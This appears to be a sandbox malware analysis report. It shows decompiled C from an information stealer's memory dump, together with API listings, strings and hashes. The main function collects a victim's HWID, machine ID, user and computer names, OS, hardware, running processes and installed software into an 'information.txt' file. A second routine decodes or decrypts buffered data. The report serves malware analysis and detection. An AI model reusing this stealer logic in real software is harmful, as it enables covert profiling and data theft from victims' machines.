				if(_t148[0x14] >= 0x10) {
					_t148 =  *_t148;
				}
				lstrcatA(_t295, _t148);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "\nHWID: ");
				_t152 = E00414C66(1, _t309 - 0x154, _t295, _t301, _t326);
				 *(_t309 - 4) = 3;
				if(_t152[0x14] >= 0x10) {
					_t152 =  *_t152;
				}
				lstrcatA(_t295, _t152);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "\n\nPath: ");
				_t157 = E00416233(_t309 - 0x154, GetCurrentProcessId());
				 *(_t309 - 4) = 4;
				if(_t157[0x14] >= 0x10) {
					_t157 =  *_t157;
				}
				lstrcatA(_t295, _t157);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "\nWork Dir: In memory");
				lstrcatA(_t295, "\n\n");
				lstrcatA(_t295, "Windows: ");
				lstrcatA(_t295, E0041527A(_t295, 0));
				lstrcatA(_t295, " [");
				_push(_t309 - 0x35c);
				 *(_t309 - 0x35c) = 0;
				_push(GetCurrentProcess());
				if( *0x446448() == 0) {
					L12:
					_t169 = "x86";
				} else {
					_t169 = "x64";
					_t330 =  *(_t309 - 0x35c);
					if( *(_t309 - 0x35c) == 0) {
						goto L12;
					}
				}
				lstrcatA(_t295, _t169);
				lstrcatA(_t295, "]\n");
				lstrcatA(_t295, "Computer Name: ");
				lstrcatA(_t295, E0041522A(1, _t293, _t295, 0));
				lstrcatA(_t295, 0x43c8dc);
				lstrcatA(_t295, "User Name: ");
				 *(_t309 - 0x35c) = 0x101;
				GetUserNameA(_t309 - 0x138, _t309 - 0x35c);
				lstrcatA(_t295, _t309 - 0x138);
				lstrcatA(_t295, 0x43c8dc);
				_t183 = E00415442(1, _t309 - 0x18c, _t293, _t295, 0x43c8dc, _t330);
				 *(_t309 - 4) = 5;
				_t185 = E00404697(_t309 - 0x18c, _t309 - 0x170, "Display Resolution: ", _t183);
				 *(_t309 - 4) = 6;
				_t187 = E0040C20F(_t309 - 0x18c, _t309 - 0x154, _t185, 0x43c8dc);
				 *(_t309 - 4) = 7;
				_t331 = _t187[0x14] - 0x10;
				if(_t187[0x14] >= 0x10) {
					_t187 =  *_t187;
				}
				lstrcatA(_t295, _t187);
				E00404354(_t309 - 0x154, 1, 0);
				E00404354(_t309 - 0x170, 1, 0);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x18c, 1, 0);
				_t192 = E00415522(_t309 - 0x154, _t293, _t295, 0x43c8dc, _t331);
				 *(_t309 - 4) = 8;
				_t194 = E00404697(_t309 - 0x18c, _t309 - 0x170, "Display Language: ", _t192);
				 *(_t309 - 4) = 9;
				_t196 = E0040C20F(_t309 - 0x18c, _t309 - 0x18c, _t194, 0x43c8dc);
				 *(_t309 - 4) = 0xa;
				_t332 = _t196[0x14] - 0x10;
				if(_t196[0x14] >= 0x10) {
					_t196 =  *_t196;
				}
				lstrcatA(_t295, _t196);
				E00404354(_t309 - 0x18c, 1, 0);
				E00404354(_t309 - 0x170, 1, 0);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "Keyboard Languages: ");
				lstrcatA(_t295, E0041593C());
				lstrcatA(_t295, 0x43c8dc);
				_push(_t309 - 0x154);
				_t206 = E00415628(0, _t309 - 0x154, _t293, _t295, 0x43c8dc, _t332);
				 *(_t309 - 4) = 0xb;
				_t208 = E00404697(_t309 - 0x154, _t309 - 0x170, "Local Time: ", _t206);
				 *(_t309 - 4) = 0xc;
				_t210 = E0040C20F(_t309 - 0x154, _t309 - 0x18c, _t208, 0x43c8dc);
				 *(_t309 - 4) = 0xd;
				_t333 = _t210[0x14] - 0x10;
				if(_t210[0x14] >= 0x10) {
					_t210 =  *_t210;
				}
				lstrcatA(_t295, _t210);
				E00404354(_t309 - 0x18c, 1, 0);
				E00404354(_t309 - 0x170, 1, 0);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				_t215 = E00415890(0, _t309 - 0x154, _t293, _t295, _t309 - 0x154, _t333, _t338);
				 *(_t309 - 4) = 0xe;
				_t217 = E00404697(_t309 - 0x154, _t309 - 0x170, "TimeZone: ", _t215);
				 *(_t309 - 4) = 0xf;
				_t219 = E0040C20F(_t309 - 0x154, _t309 - 0x18c, _t217, "\n\n");
				 *(_t309 - 4) = 0x10;
				_t334 = _t219[0x14] - 0x10;
				if(_t219[0x14] >= 0x10) {
					_t219 =  *_t219;
				}
				lstrcatA(_t295, _t219);
				E00404354(_t309 - 0x18c, 1, 0);
				E00404354(_t309 - 0x170, 1, 0);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				 *((intOrPtr*)(_t309 - 0x140)) = 0xf;
				 *((intOrPtr*)(_t309 - 0x144)) = 0;
				 *(_t309 - 0x154) = 0;
				E00404396(_t309 - 0x154, _t334, "[Hardware]\n", 0xb);
				 *(_t309 - 4) = 0x11;
				_t335 =  *((intOrPtr*)(_t309 - 0x140)) - 0x10;
				_t225 =  *(_t309 - 0x154);
				if( *((intOrPtr*)(_t309 - 0x140)) < 0x10) {
					_t225 = _t309 - 0x154;
				}
				lstrcatA(_t295, _t225);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t295, "Processor: ");
				lstrcatA(_t295, E00414F5B(_t295, 1));
				lstrcatA(_t295, 0x43c8dc);
				_t232 = E00414F0E(0, _t293, _t309 - 0x154, 1, _t335);
				 *(_t309 - 4) = 0x12;
				_t234 = E00404697(_t309 - 0x154, _t309 - 0x170, "CPU Count: ", _t232);
				 *(_t309 - 4) = 0x13;
				_t236 = E0040C20F(_t309 - 0x154, _t309 - 0x18c, _t234, 0x43c8dc);
				 *(_t309 - 4) = 0x14;
				if(_t236[0x14] >= 0x10) {
					_t236 =  *_t236;
				}
				_t308 =  *(_t309 - 0x364);
				lstrcatA(_t308, _t236);
				E00404354(_t309 - 0x18c, 1, 0);
				E00404354(_t309 - 0x170, 1, 0);
				 *(_t309 - 4) =  *(_t309 - 4) | 0xffffffff;
				E00404354(_t309 - 0x154, 1, 0);
				lstrcatA(_t308, "RAM: ");
				lstrcatA(_t308, E004151AA(0, _t308));
				lstrcatA(_t308, 0x43c8dc);
				lstrcatA(_t308, "VideoCard: ");
				 *(_t309 - 0x358) = 0x1a8;
				EnumDisplayDevicesA(0, 0, _t309 - 0x358, 1);
				lstrcatA(_t308, _t309 - 0x334);
				lstrcatA(_t308, 0x43c8dc);
				lstrcatA(_t308, "[Processes]\n");
				E00415A22(0, _t293, 0x43c8dc, _t308,  *(_t309 - 4));
				lstrcatA(_t308, "\n[Software]\n");
				E00415007();
				E0041CE7C( *((intOrPtr*)(_t309 - 0x360)), "\\information.txt",  *0x446320(_t308, _t308), 3);
				return E00420888(0, 0x43c8dc, _t308);
			}


































                                                                    0x0040afb3
                                                                    0x0040afb3
                                                                    0x0040afb3
                                                                    0x0040afb3
                                                                    0x0040afbd
                                                                    0x0040afc2
                                                                    0x0040afcf
                                                                    0x0040afe2
                                                                    0x0040afeb
                                                                    0x0040aff1
                                                                    0x0040aff6
                                                                    0x0040affd
                                                                    0x0040b005
                                                                    0x0040b017
                                                                    0x0040b025
                                                                    0x0040b031
                                                                    0x0040b036
                                                                    0x0040b03d
                                                                    0x0040b03f
                                                                    0x0040b03f
                                                                    0x0040b043
                                                                    0x0040b049
                                                                    0x0040b058
                                                                    0x0040b063
                                                                    0x0040b06f
                                                                    0x0040b07a
                                                                    0x0040b086
                                                                    0x0040b092
                                                                    0x0040b097
                                                                    0x0040b09e
                                                                    0x0040b0a0
                                                                    0x0040b0a0
                                                                    0x0040b0a4
                                                                    0x0040b0aa
                                                                    0x0040b0b7
                                                                    0x0040b0c2
                                                                    0x0040b0c8
                                                                    0x0040b0ce
                                                                    0x0040b0d3
                                                                    0x0040b0da
                                                                    0x0040b0de
                                                                    0x0040b0e0
                                                                    0x0040b0e0
                                                                    0x0040b0e4
                                                                    0x0040b0ea
                                                                    0x0040b0f7
                                                                    0x0040b102
                                                                    0x0040b10e
                                                                    0x0040b113
                                                                    0x0040b11e
                                                                    0x0040b120
                                                                    0x0040b120
                                                                    0x0040b124
                                                                    0x0040b12a
                                                                    0x0040b137
                                                                    0x0040b142
                                                                    0x0040b155
                                                                    0x0040b15b
                                                                    0x0040b166
                                                                    0x0040b168
                                                                    0x0040b168
                                                                    0x0040b16c
                                                                    0x0040b172
                                                                    0x0040b180
                                                                    0x0040b18b
                                                                    0x0040b197
                                                                    0x0040b1a3
                                                                    0x0040b1b0
                                                                    0x0040b1bc
                                                                    0x0040b1c8
                                                                    0x0040b1c9
                                                                    0x0040b1d5
                                                                    0x0040b1de
                                                                    0x0040b1ed
                                                                    0x0040b1ed
                                                                    0x0040b1e0
                                                                    0x0040b1e0
                                                                    0x0040b1e5
                                                                    0x0040b1eb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040b1eb
                                                                    0x0040b1f4
                                                                    0x0040b200
                                                                    0x0040b20c
                                                                    0x0040b219
                                                                    0x0040b226
                                                                    0x0040b232
                                                                    0x0040b246
                                                                    0x0040b250
                                                                    0x0040b25e
                                                                    0x0040b266
                                                                    0x0040b272
                                                                    0x0040b284
                                                                    0x0040b28b
                                                                    0x0040b29c
                                                                    0x0040b2a0
                                                                    0x0040b2a8
                                                                    0x0040b2ac
                                                                    0x0040b2b0
                                                                    0x0040b2b2
                                                                    0x0040b2b2
                                                                    0x0040b2b6
                                                                    0x0040b2c5
                                                                    0x0040b2d3
                                                                    0x0040b2d8
                                                                    0x0040b2e5
                                                                    0x0040b2f0
                                                                    0x0040b302
                                                                    0x0040b309
                                                                    0x0040b31a
                                                                    0x0040b31e
                                                                    0x0040b326
                                                                    0x0040b32a
                                                                    0x0040b32e
                                                                    0x0040b330
                                                                    0x0040b330
                                                                    0x0040b334
                                                                    0x0040b345
                                                                    0x0040b353
                                                                    0x0040b358
                                                                    0x0040b365
                                                                    0x0040b370
                                                                    0x0040b37d
                                                                    0x0040b385
                                                                    0x0040b391
                                                                    0x0040b392
                                                                    0x0040b3a4
                                                                    0x0040b3ab
                                                                    0x0040b3bc
                                                                    0x0040b3c0
                                                                    0x0040b3c8
                                                                    0x0040b3cc
                                                                    0x0040b3d0
                                                                    0x0040b3d2
                                                                    0x0040b3d2
                                                                    0x0040b3d6
                                                                    0x0040b3e5
                                                                    0x0040b3f3
                                                                    0x0040b3f8
                                                                    0x0040b405
                                                                    0x0040b410
                                                                    0x0040b422
                                                                    0x0040b429
                                                                    0x0040b43e
                                                                    0x0040b442
                                                                    0x0040b44a
                                                                    0x0040b44e
                                                                    0x0040b452
                                                                    0x0040b454
                                                                    0x0040b454
                                                                    0x0040b458
                                                                    0x0040b469
                                                                    0x0040b476
                                                                    0x0040b47b
                                                                    0x0040b487
                                                                    0x0040b499
                                                                    0x0040b4a3
                                                                    0x0040b4a9
                                                                    0x0040b4af
                                                                    0x0040b4b4
                                                                    0x0040b4bb
                                                                    0x0040b4c2
                                                                    0x0040b4c8
                                                                    0x0040b4ca
                                                                    0x0040b4ca
                                                                    0x0040b4d2
                                                                    0x0040b4d8
                                                                    0x0040b4e4
                                                                    0x0040b4ef
                                                                    0x0040b4fc
                                                                    0x0040b508
                                                                    0x0040b514
                                                                    0x0040b526
                                                                    0x0040b52d
                                                                    0x0040b543
                                                                    0x0040b547
                                                                    0x0040b54f
                                                                    0x0040b557
                                                                    0x0040b559
                                                                    0x0040b559
                                                                    0x0040b55b
                                                                    0x0040b563
                                                                    0x0040b572
                                                                    0x0040b580
                                                                    0x0040b585
                                                                    0x0040b592
                                                                    0x0040b59d
                                                                    0x0040b5aa
                                                                    0x0040b5b2
                                                                    0x0040b5be
                                                                    0x0040b5cf
                                                                    0x0040b5d9
                                                                    0x0040b5e7
                                                                    0x0040b5ef
                                                                    0x0040b5fb
                                                                    0x0040b601
                                                                    0x0040b60c
                                                                    0x0040b613
                                                                    0x0040b62f
                                                                    0x0040b63c

                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040AFBD
                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F,00000364,0040BC82), ref: 0040AFD5
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040AFDC
                                                                    • __time64.LIBCMT ref: 0040AFF1
                                                                      • Part of subcall function 0041ED37: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0040AFF6,?), ref: 0041ED42
                                                                      • Part of subcall function 0041ED37: __aulldiv.LIBCMT ref: 0041ED62
                                                                    • __localtime64_s.LIBCMT ref: 0040B005
                                                                    • _asctime_s.LIBCMT ref: 0040B017
                                                                    • lstrcatA.KERNEL32(00000000,Version: ,?,?,?,00000000), ref: 0040B025
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B043
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C,00000001,00000000,?,?,?,00000000), ref: 0040B063
                                                                    • lstrcatA.KERNEL32(00000000,Date: ,?,?,?,00000000), ref: 0040B06F
                                                                    • lstrcatA.KERNEL32(00000000,?,?,?,?,00000000), ref: 0040B07A
                                                                    • lstrcatA.KERNEL32(00000000,MachineID: ,?,?,?,00000000), ref: 0040B086
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B0A4
                                                                    • lstrcatA.KERNEL32(00000000,GUID: ,00000001,00000000,?,?,?,00000000), ref: 0040B0C2
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B0E4
                                                                    • lstrcatA.KERNEL32(00000000,HWID: ,00000001,00000000,?,?,?,00000000), ref: 0040B102
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B124
                                                                    • lstrcatA.KERNEL32(00000000,Path: ,00000001,00000000,?,?,?,00000000), ref: 0040B142
                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040B148
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B16C
                                                                    • lstrcatA.KERNEL32(00000000,Work Dir: In memory,00000001,00000000,?,?,?,00000000), ref: 0040B18B
                                                                    • lstrcatA.KERNEL32(00000000,0043EC3C,?,?,?,00000000), ref: 0040B197
                                                                    • lstrcatA.KERNEL32(00000000,Windows: ,?,?,?,00000000), ref: 0040B1A3
                                                                      • Part of subcall function 0041527A: _memset.LIBCMT ref: 004152B2
                                                                      • Part of subcall function 0041527A: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,00000001), ref: 004152CE
                                                                      • Part of subcall function 0041527A: RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?,?,?,00000001), ref: 004152ED
                                                                      • Part of subcall function 0041527A: RegCloseKey.ADVAPI32(?,?,?,00000001), ref: 004152F6
                                                                      • Part of subcall function 0041527A: CharToOemA.USER32(?,?), ref: 00415307
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B1B0
                                                                    • lstrcatA.KERNEL32(00000000,0043EC94,?,?,?,00000000), ref: 0040B1BC
                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00000000), ref: 0040B1CF
                                                                    • IsWow64Process.KERNEL32(00000000,?,?,?,00000000), ref: 0040B1D6
                                                                    • lstrcatA.KERNEL32(00000000,x86,?,?,?,00000000), ref: 0040B1F4
                                                                    • lstrcatA.KERNEL32(00000000,0043EC98,?,?,?,00000000), ref: 0040B200
                                                                    • lstrcatA.KERNEL32(00000000,Computer Name: ,?,?,?,00000000), ref: 0040B20C
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040B219
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC,?,?,?,00000000), ref: 0040B226
                                                                    • lstrcatA.KERNEL32(00000000,User Name: ,?,?,?,00000000), ref: 0040B232
                                                                    • GetUserNameA.ADVAPI32 ref: 0040B250
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040B25E
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040B266
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 0040B2B6
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B334
                                                                    • lstrcatA.KERNEL32(00000000,Keyboard Languages: ,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B370
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B37D
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B385
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000), ref: 0040B3D6
                                                                    • lstrcatA.KERNEL32(00000000,00000000,?,?,?,00000000,00000001,00000000,?,?,?,?,?,?), ref: 0040B458
                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040B4D2
                                                                    • lstrcatA.KERNEL32(00000000,Processor: ,00000001,00000000), ref: 0040B4EF
                                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040B4FC
                                                                    • lstrcatA.KERNEL32(00000000,0043C8DC), ref: 0040B508
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B563
                                                                    • lstrcatA.KERNEL32(?,RAM: ,00000001,00000000,00000001,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B59D
                                                                    • lstrcatA.KERNEL32(?,00000000,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B5AA
                                                                    • lstrcatA.KERNEL32(?,0043C8DC,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B5B2
                                                                    • lstrcatA.KERNEL32(?,VideoCard: ,?,?,?,00000000,00000001,00000000,?,?,?,00000000,00000001,00000000), ref: 0040B5BE
                                                                    • EnumDisplayDevicesA.USER32 ref: 0040B5D9
                                                                    • lstrcatA.KERNEL32(?,?), ref: 0040B5E7
                                                                    • lstrcatA.KERNEL32(?,0043C8DC), ref: 0040B5EF
                                                                    • lstrcatA.KERNEL32(?,[Processes]), ref: 0040B5FB
                                                                    • lstrcatA.KERNEL32(?,[Software]), ref: 0040B60C
                                                                    • lstrlen.KERNEL32(?,?), ref: 0040B619
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$Process$CurrentHeapTime$AllocCharCloseDevicesDisplayEnumFileH_prolog3_NameOpenQuerySystemUserValueWow64__aulldiv__localtime64_s__time64_asctime_s_memsetlstrlen
                                                                    • String ID: Path: $GUID: $HWID: $Work Dir: In memory$[Software]$CPU Count: $Computer Name: $Date: $Display Language: $Display Resolution: $Keyboard Languages: $Local Time: $MachineID: $Processor: $RAM: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $[Hardware]$[Processes]$\information.txt$x64$x86
                                                                    • API String ID: 1335850989-734002641
                                                                    • Opcode ID: 53b38351b64c9ed1f71df56214278ff7a7c5ae542ae4dbf7256e907beb8166d8
                                                                    • Instruction ID: baad301e06235c4e2ba7717504205242f553dcd095e1ccd8dd14774e29db1a1a
                                                                    • Opcode Fuzzy Hash: 53b38351b64c9ed1f71df56214278ff7a7c5ae542ae4dbf7256e907beb8166d8
                                                                    • Instruction Fuzzy Hash: E6027E71900118EFDB11AB51DD4AFEE7B7CEB4A315F1000AAF115A71E1CB784B898B6E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004113E3 Relevance: 76.9, APIs: 51, Instructions: 369memorystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 80%
                                                                    			E004113E3(void* __ebx, void* __ecx, long* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t130;
				intOrPtr _t136;
				intOrPtr _t142;
				long* _t153;
				long _t159;
				void* _t161;
				intOrPtr* _t165;
				void* _t173;
				void* _t188;
				void* _t196;
				long _t225;
				void* _t226;
				long* _t255;
				void* _t256;
				void* _t260;
				void* _t261;
				void* _t262;
				void* _t269;
				void* _t270;
				signed int _t271;
				void* _t273;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t279;
				void* _t280;
				void* _t281;

				_t281 = __eflags;
				_t253 = __edx;
				_t274 = _t273 - 0x70;
				_t271 = _t274 - 4;
				_t130 =  *0x443674; // 0x393162b1
				 *(_t271 + 0x70) = _t130 ^ _t271;
				_push(0x24);
				E004207D5(E004341F1, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t271 - 0x30)) =  *((intOrPtr*)(_t271 + 0x7c));
				_t225 = 0;
				 *((intOrPtr*)(_t271 - 0x2c)) =  *((intOrPtr*)(_t271 + 0x80));
				_t255 = __edx;
				_t136 = 0xf;
				 *(_t271 - 0x20) = __edx;
				 *((intOrPtr*)(_t271 - 0x24)) = 0;
				 *(_t271 - 0x10) = 0;
				 *(_t271 - 0x14) = 0;
				 *((intOrPtr*)(_t271 + 0x68)) = _t136;
				 *((intOrPtr*)(_t271 + 0x64)) = 0;
				 *(_t271 + 0x54) = 0;
				 *((intOrPtr*)(_t271 - 4)) = 0;
				 *((intOrPtr*)(_t271 + 0x4c)) = _t136;
				 *((intOrPtr*)(_t271 + 0x48)) = 0;
				 *((char*)(_t271 + 0x38)) = 0;
				_push(_t271 - 0x14);
				_push(__ecx);
				 *((char*)(_t271 - 4)) = 1;
				 *((intOrPtr*)(_t271 - 0x24)) = E004112D0(0, _t271 - 0x10, __edx, __esi, _t281);
				_t260 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
				if(_t260 != 0) {
					E0041E192(_t260,  *(_t271 - 0x14),  *(_t271 - 0x10));
					_t275 = _t274 + 0xc;
					__eflags =  *(_t271 - 0x10);
					if( *(_t271 - 0x10) != 0) {
						HeapFree(GetProcessHeap(), 0,  *(_t271 - 0x10));
						 *(_t271 - 0x10) = 0;
					}
					_t142 =  *((intOrPtr*)(_t271 - 0x24));
					__eflags = _t142 - 0xff;
					if(__eflags != 0) {
						 *((intOrPtr*)(_t271 - 0x28)) = _t142;
						goto L15;
					} else {
						_push(_t271 - 0x14);
						_push(_t260);
						E004112D0(_t225, _t271 - 0x10, _t255, _t260, __eflags);
						HeapFree(GetProcessHeap(), _t225, _t260);
						_t270 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
						__eflags = _t270 - _t225;
						if(_t270 == _t225) {
							goto L1;
						}
						E0041E192(_t270,  *(_t271 - 0x14),  *(_t271 - 0x10));
						_t280 = _t275 + 0xc;
						__eflags =  *(_t271 - 0x10) - _t225;
						if(__eflags != 0) {
							HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
							 *(_t271 - 0x10) = _t225;
						}
						_push(_t271 - 0x14);
						_push(_t270);
						 *((intOrPtr*)(_t271 - 0x28)) = E004112D0(_t225, _t271 - 0x10, _t255, _t270, __eflags);
						HeapFree(GetProcessHeap(), _t225, _t270);
						_t260 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
						__eflags = _t260 - _t225;
						if(_t260 == _t225) {
							goto L1;
						} else {
							E0041E192(_t260,  *(_t271 - 0x14),  *(_t271 - 0x10));
							_t275 = _t280 + 0xc;
							__eflags =  *(_t271 - 0x10) - _t225;
							if(__eflags != 0) {
								HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
								 *(_t271 - 0x10) = _t225;
							}
							L15:
							_push(_t271 - 0x14);
							_push(_t260);
							 *(_t271 - 0x18) = E004112D0(_t225, _t271 - 0x10, _t255, _t260, __eflags) + _t144;
							HeapFree(GetProcessHeap(), _t225, _t260);
							_t261 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
							 *(_t271 - 0x1c) = _t261;
							__eflags = _t261 - _t225;
							if(_t261 == _t225) {
								goto L1;
							}
							E0041E192(_t261,  *(_t271 - 0x14),  *(_t271 - 0x10));
							_t277 = _t275 + 0xc;
							__eflags =  *(_t271 - 0x10) - _t225;
							if( *(_t271 - 0x10) != _t225) {
								HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
							}
							_t159 =  *0x446320(_t261) + 1 -  *(_t271 - 0x18);
							 *(_t271 - 0x14) = _t159;
							_t161 = HeapAlloc(GetProcessHeap(), 8, _t159);
							 *(_t271 - 0x10) = _t161;
							__eflags = _t161 - _t225;
							if(_t161 == _t225) {
								L4:
								_t255[5] = 0xf;
								_t255[4] = _t225;
								 *_t255 = _t225;
								E00404331(_t255, 0x43c8d8);
								E00404354(_t271 + 0x38, 1, _t225);
								E00404354(_t271 + 0x54, 1, _t225);
								_t153 = _t255;
								goto L30;
							} else {
								 *(_t271 + 0x30) = 0xf;
								 *(_t271 + 0x2c) = _t225;
								 *(_t271 + 0x1c) = _t225;
								E00404331(_t271 + 0x1c, _t261);
								 *((char*)(_t271 - 4)) = 2;
								_t165 = E0040C034(_t271 + 0x1c, _t271, _t271 + 0x1c,  *(_t271 - 0x18),  *0x446320(_t261));
								__eflags =  *((intOrPtr*)(_t165 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t165 + 0x14)) >= 0x10) {
									_t165 =  *_t165;
								}
								E0041E192( *(_t271 - 0x10),  *(_t271 - 0x14), _t165);
								_t278 = _t277 + 0xc;
								E00404354(_t271, 1, _t225);
								 *((char*)(_t271 - 4)) = 1;
								E00404354(_t271 + 0x1c, 1, _t225);
								HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x1c));
								_t79 =  *0x446320( *(_t271 - 0x10)) + 1; // 0x1
								_t264 = _t79;
								 *(_t271 - 0x14) = _t264;
								_t173 = HeapAlloc(GetProcessHeap(), 8, _t264);
								_push( *(_t271 - 0x10));
								 *(_t271 - 0x1c) = _t173;
								__eflags = _t173 - _t225;
								if(_t173 == _t225) {
									L3:
									HeapFree(GetProcessHeap(), _t225, ??);
									goto L4;
								} else {
									_push(_t264);
									_push(_t173);
									E0041E192();
									_t279 = _t278 + 0xc;
									HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
									 *(_t271 - 0x10) = _t225;
									 *(_t271 - 0x18) = _t225;
									__eflags =  *((intOrPtr*)(_t271 - 0x28)) - _t225;
									if(__eflags <= 0) {
										L27:
										__eflags =  *((intOrPtr*)(_t271 - 0x24)) - 0xff;
										if( *((intOrPtr*)(_t271 - 0x24)) == 0xff) {
											 *(_t271 + 0x30) = 0xf;
											 *(_t271 + 0x2c) = _t225;
											 *(_t271 + 0x1c) = _t225;
											E00404331(_t271 + 0x1c,  *((intOrPtr*)(_t271 - 0x30)));
											 *((char*)(_t271 - 4)) = 3;
											E004042ED(_t271 + 0x38, _t271 + 0x1c);
											 *((char*)(_t271 - 4)) = 1;
											E00404354(_t271 + 0x1c, 1, _t225);
											E0040C297(_t271 + 0x38,  *((intOrPtr*)(_t271 - 0x2c)));
											_t188 = E0040C034(_t271 + 0x1c, _t271, _t271 + 0x54,  *((intOrPtr*)(_t271 + 0x48)),  *((intOrPtr*)(_t271 + 0x64)));
											 *((char*)(_t271 - 4)) = 4;
											E004042ED(_t271 + 0x54, _t188);
											 *((char*)(_t271 - 4)) = 1;
											E00404354(_t271, 1, _t225);
											_t255 =  *(_t271 - 0x20);
										}
										HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x1c));
										_t255[5] = 0xf;
										_t255[4] = _t225;
										 *_t255 = _t225;
										E004042ED(_t255, _t271 + 0x54);
										E00404354(_t271 + 0x38, 1, _t225);
										E00404354(_t271 + 0x54, 1, _t225);
										_t153 =  *(_t271 - 0x20);
										L30:
										 *[fs:0x0] =  *((intOrPtr*)(_t271 - 0xc));
										_pop(_t256);
										_pop(_t262);
										_pop(_t226);
										return E0041DA9B(_t153, _t226,  *(_t271 + 0x70) ^ _t271, _t253, _t256, _t262);
									} else {
										goto L23;
									}
									while(1) {
										L23:
										_push(_t271 - 0x14);
										_push( *(_t271 - 0x1c));
										_t250 = _t271 - 0x10;
										_t269 = E004112D0(_t225, _t271 - 0x10, _t255, _t264, __eflags);
										HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x1c));
										_t196 = HeapAlloc(GetProcessHeap(), 8,  *(_t271 - 0x14));
										 *(_t271 - 0x1c) = _t196;
										__eflags = _t196 - _t225;
										if(_t196 == _t225) {
											goto L1;
										}
										E0041E192(_t196,  *(_t271 - 0x14),  *(_t271 - 0x10));
										_t279 = _t279 + 0xc;
										__eflags =  *(_t271 - 0x10) - _t225;
										if( *(_t271 - 0x10) != _t225) {
											HeapFree(GetProcessHeap(), _t225,  *(_t271 - 0x10));
											 *(_t271 - 0x10) = _t225;
										}
										_t264 = _t271 + 0x54;
										E0040C3CF(1, _t250, _t271 + 0x54, _t271, _t269);
